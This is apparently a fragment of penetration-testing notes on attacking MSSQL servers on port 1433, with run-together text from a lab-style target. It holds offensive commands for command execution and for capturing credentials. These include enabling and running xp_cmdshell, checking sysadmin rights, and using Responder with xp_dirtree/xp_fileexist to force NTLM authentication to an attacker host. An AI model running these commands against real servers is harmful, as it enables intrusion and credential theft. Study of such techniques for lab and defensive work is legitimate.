π«’Port 1433 (MSSQL)
impacket
mssqlclient.py -windows-auth reporting@10.10.10.125
SQL>shell
SQL> enable_xp_cmdshell
SQL> xp_cmdshell whoami
querier\mssql-svcsqsh
sqsh -S mssql -D MyDB -U DOMAIN\\testuser -P MyTestingClearPassword1mssql commands
select IS_SRVROLEMEMBER (β 'sysadmin'β ) # check permisionsresponder
responder -I tun0 -rvSQL>exec xp_dirtree '\\10.10.14.6\share\file' SQL>exec xp_fileexist '\\10.10.16.2\share\file'
mssql reverse shell
nmap nse
Get information
Brute force
Having credentials
Manual exploit
Last updated